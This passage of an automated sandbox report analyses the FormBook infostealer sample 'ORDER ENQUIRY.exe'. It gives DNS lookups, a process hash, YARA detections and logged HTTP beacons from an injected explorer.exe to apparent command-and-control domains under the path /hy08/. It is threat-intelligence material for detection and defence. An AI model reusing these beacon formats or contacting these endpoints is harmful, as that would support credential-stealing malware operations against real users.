                                                                                                                                                                        Oct 1, 2024 10:07:24.056056976 CEST4972380192.168.2.5154.197.185.220
                                                                                                                                                                        Oct 1, 2024 10:07:24.060947895 CEST8049723154.197.185.220192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:04.907994032 CEST4972480192.168.2.5151.101.0.119
                                                                                                                                                                        Oct 1, 2024 10:08:04.912971020 CEST8049724151.101.0.119192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:04.913078070 CEST4972480192.168.2.5151.101.0.119
                                                                                                                                                                        Oct 1, 2024 10:08:04.913273096 CEST4972480192.168.2.5151.101.0.119
                                                                                                                                                                        Oct 1, 2024 10:08:04.918031931 CEST8049724151.101.0.119192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:05.381761074 CEST8049724151.101.0.119192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:05.381786108 CEST8049724151.101.0.119192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:05.381882906 CEST4972480192.168.2.5151.101.0.119
                                                                                                                                                                        Oct 1, 2024 10:08:05.381930113 CEST4972480192.168.2.5151.101.0.119
                                                                                                                                                                        Oct 1, 2024 10:08:05.386691093 CEST8049724151.101.0.119192.168.2.5
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 1, 2024 10:05:41.492013931 CEST5916853192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:05:41.534760952 CEST53591681.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:02.038079023 CEST6313653192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:06:02.155446053 CEST53631361.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:21.850651026 CEST5525353192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:06:22.223238945 CEST53552531.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:06:42.210020065 CEST6085453192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:06:42.224543095 CEST53608541.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:02.651340961 CEST5553653192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:07:03.505281925 CEST53555361.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:23.100765944 CEST6169553192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:07:23.560035944 CEST53616951.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:07:44.185404062 CEST5431353192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:07:44.194782972 CEST53543131.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:04.821366072 CEST5905253192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST53590521.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:25.243011951 CEST6255053192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:08:26.165440083 CEST53625501.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:08:45.948699951 CEST5241253192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:08:46.041506052 CEST53524121.1.1.1192.168.2.5
                                                                                                                                                                        Oct 1, 2024 10:09:27.151361942 CEST5356353192.168.2.51.1.1.1
                                                                                                                                                                        Oct 1, 2024 10:09:27.166568041 CEST53535631.1.1.1192.168.2.5
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 1, 2024 10:05:41.492013931 CEST192.168.2.51.1.1.10x6ea6Standard query (0)www.wergol.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:02.038079023 CEST192.168.2.51.1.1.10x62f1Standard query (0)www.os9user.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:21.850651026 CEST192.168.2.51.1.1.10xaf8dStandard query (0)www.mksport-app.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:42.210020065 CEST192.168.2.51.1.1.10x436cStandard query (0)www.raidsa.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:02.651340961 CEST192.168.2.51.1.1.10x60afStandard query (0)www.manhuafeifei.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:23.100765944 CEST192.168.2.51.1.1.10xc239Standard query (0)www.horxncnt.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:44.185404062 CEST192.168.2.51.1.1.10x5dbbStandard query (0)www.cttlca.clickA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.821366072 CEST192.168.2.51.1.1.10xc7f9Standard query (0)www.flywatchsecurity.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:25.243011951 CEST192.168.2.51.1.1.10x6eStandard query (0)www.21556934.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:45.948699951 CEST192.168.2.51.1.1.10xd27Standard query (0)www.valo.gamesA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:09:27.151361942 CEST192.168.2.51.1.1.10x1ee0Standard query (0)www.avai66.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 1, 2024 10:05:41.534760952 CEST1.1.1.1192.168.2.50x6ea6No error (0)www.wergol.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:05:41.534760952 CEST1.1.1.1192.168.2.50x6ea6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:02.155446053 CEST1.1.1.1192.168.2.50x62f1No error (0)www.os9user.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:22.223238945 CEST1.1.1.1192.168.2.50xaf8dNo error (0)www.mksport-app.com154.221.68.229A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:42.224543095 CEST1.1.1.1192.168.2.50x436cNo error (0)www.raidsa.xyzraidsa.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:42.224543095 CEST1.1.1.1192.168.2.50x436cNo error (0)raidsa.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:06:42.224543095 CEST1.1.1.1192.168.2.50x436cNo error (0)raidsa.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:03.505281925 CEST1.1.1.1192.168.2.50x60afName error (3)www.manhuafeifei.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:23.560035944 CEST1.1.1.1192.168.2.50xc239No error (0)www.horxncnt.xyz154.197.185.220A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:07:44.194782972 CEST1.1.1.1192.168.2.50x5dbbName error (3)www.cttlca.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST1.1.1.1192.168.2.50xc7f9No error (0)www.flywatchsecurity.comflywatchsecurity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST1.1.1.1192.168.2.50xc7f9No error (0)flywatchsecurity.com151.101.0.119A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST1.1.1.1192.168.2.50xc7f9No error (0)flywatchsecurity.com151.101.64.119A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST1.1.1.1192.168.2.50xc7f9No error (0)flywatchsecurity.com151.101.128.119A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:04.861135960 CEST1.1.1.1192.168.2.50xc7f9No error (0)flywatchsecurity.com151.101.192.119A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:08:46.041506052 CEST1.1.1.1192.168.2.50xd27Name error (3)www.valo.gamesnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 1, 2024 10:09:27.166568041 CEST1.1.1.1192.168.2.50x1ee0Name error (3)www.avai66.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        • www.wergol.com
                                                                                                                                                                        • www.os9user.com
                                                                                                                                                                        • www.mksport-app.com
                                                                                                                                                                        • www.raidsa.xyz
                                                                                                                                                                        • www.horxncnt.xyz
                                                                                                                                                                        • www.flywatchsecurity.com
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.54971723.227.38.74801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:05:41.540818930 CEST166OUTGET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.wergol.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Oct 1, 2024 10:05:42.014441013 CEST1236INHTTP/1.1 403 Forbidden
                                                                                                                                                                        Date: Tue, 01 Oct 2024 08:05:41 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Content-Length: 4514
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                        Cache-Control: max-age=15
                                                                                                                                                                        Expires: Tue, 01 Oct 2024 08:05:56 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Juvm0SPz3sAHG%2FBUT138ZSlgrVuD0SkVy1HOtfpCxsNHwst3jIY1Gw7vmUFRxncMYqglCz91MflmtJTsHRmOqWUnQyNLqAjFd7w4qYWs%2FwiEr60fOvuRMlHGszd6KVMM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server-Timing: cfRequestDuration;dur=9.999752
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8cbaf2f93d32188d-EWR
                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="C
                                                                                                                                                                        Oct 1, 2024 10:05:42.014470100 CEST1236INData Raw: 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62
                                                                                                                                                                        Data Ascii: ontent-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="styl
                                                                                                                                                                        Oct 1, 2024 10:05:42.014481068 CEST1236INData Raw: 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e
                                                                                                                                                                        Data Ascii: om</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot err
                                                                                                                                                                        Oct 1, 2024 10:05:42.014487028 CEST1236INData Raw: 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69
                                                                                                                                                                        Data Ascii: bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border
                                                                                                                                                                        Oct 1, 2024 10:05:42.014494896 CEST392INData Raw: 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65
                                                                                                                                                                        Data Ascii: ntListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer -


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.549719199.59.243.227801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:06:02.161168098 CEST167OUTGET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.os9user.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Oct 1, 2024 10:06:02.623742104 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                        date: Tue, 01 Oct 2024 08:06:01 GMT
                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                        content-length: 1322
                                                                                                                                                                        x-request-id: bc2d180f-83e2-44f2-a27d-383717e1ffc4
                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CoaXIYTNmt+8twlP9CTUGScu2wS16sLCLVgz7ArlJWnuHhgOgWhQ7xx1EVJ4auYr3XVieI+thUu6IpZP8XeuxQ==
                                                                                                                                                                        set-cookie: parking_session=bc2d180f-83e2-44f2-a27d-383717e1ffc4; expires=Tue, 01 Oct 2024 08:21:02 GMT; path=/
                                                                                                                                                                        connection: close
                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 6f 61 58 49 59 54 4e 6d 74 2b 38 74 77 6c 50 39 43 54 55 47 53 63 75 32 77 53 31 36 73 4c 43 4c 56 67 7a 37 41 72 6c 4a 57 6e 75 48 68 67 4f 67 57 68 51 37 78 78 31 45 56 4a 34 61 75 59 72 33 58 56 69 65 49 2b 74 68 55 75 36 49 70 5a 50 38 58 65 75 78 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CoaXIYTNmt+8twlP9CTUGScu2wS16sLCLVgz7ArlJWnuHhgOgWhQ7xx1EVJ4auYr3XVieI+thUu6IpZP8XeuxQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                        Oct 1, 2024 10:06:02.623873949 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmMyZDE4MGYtODNlMi00NGYyLWEyN2QtMzgzNzE3ZTFmZmM0IiwicGFnZV9
                                                                                                                                                                        Oct 1, 2024 10:06:02.623883963 CEST551INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 33 4e 7a 59 35 4f 54 59 79 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 62 33 4d 35 64 58 4e 6c 63 69 35 6a 62 32 30 76 61 48 6b 77 4f 43 38 2f 52 33 68 73 57
                                                                                                                                                                        Data Ascii: 0aW1lIjoxNzI3NzY5OTYyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3M5dXNlci5jb20vaHkwOC8/R3hsWD03akJ6aUJvTmVhWjBZQllDV3V5dWlNai9DWXJaSmUzR1pTeUdxRW9WQ2dIZnE3K0JDdmVWVERua1ZLUHlBWm9lNEp0RFx1MDAyNkRWUlhiZD10WEl4QmhFaGx6SkxSIiwicGFnZV9tZXRob2QiOiJHRVQiLCJwYW


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.549720154.221.68.229801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:06:22.229118109 CEST171OUTGET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.mksport-app.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.5497223.33.130.190801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:06:42.230340958 CEST166OUTGET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.raidsa.xyz
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Oct 1, 2024 10:06:42.704962015 CEST349INHTTP/1.1 200 OK
                                                                                                                                                                        Server: openresty
                                                                                                                                                                        Date: Tue, 01 Oct 2024 08:06:42 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 209
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 78 6c 58 3d 33 30 65 66 48 36 69 37 50 7a 30 6e 42 54 76 54 79 61 53 32 37 54 7a 63 77 45 2f 42 31 5a 78 76 50 65 75 73 63 53 6e 6b 54 5a 55 51 4f 4c 6e 2f 43 77 41 55 55 30 67 64 66 43 52 33 64 61 33 34 6f 57 74 56 26 44 56 52 58 62 64 3d 74 58 49 78 42 68 45 68 6c 7a 4a 4c 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR"}</script></head></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.549723154.197.185.220801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:07:23.571968079 CEST168OUTGET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.horxncnt.xyz
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.549724151.101.0.119801028C:\Windows\explorer.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 1, 2024 10:08:04.913273096 CEST176OUTGET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1
                                                                                                                                                                        Host: www.flywatchsecurity.com
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Oct 1, 2024 10:08:05.381761074 CEST793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        server: adobe
                                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                                        location: https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR
                                                                                                                                                                        cache-control: s-maxage=31536000
                                                                                                                                                                        x-trace-id: 923128a4-cd6c-40a1-ba24-e333ff1d4ae6
                                                                                                                                                                        x-app-name: Pro2-Renderer
                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Age: 0
                                                                                                                                                                        Date: Tue, 01 Oct 2024 08:08:05 GMT
                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740033-EWR
                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                        X-Timer: S1727770085.308888,VS0,VE26
                                                                                                                                                                        Vary: Accept-Language, Accept-Encoding,Fastly-SSL, X-Use-Renderer
                                                                                                                                                                        X-Last-60s-Hits: 1
                                                                                                                                                                        Set-Cookie: pro2_renderer_flex=1; secure; httponly; max-age=86400


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:04:05:04
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\ORDER ENQUIRY.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\ORDER ENQUIRY.exe"
                                                                                                                                                                        Imagebase:0xcd0000
                                                                                                                                                                        File size:695'808 bytes
                                                                                                                                                                        MD5 hash:754FA726BA767C17EBBCE69E967D40CA
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:3
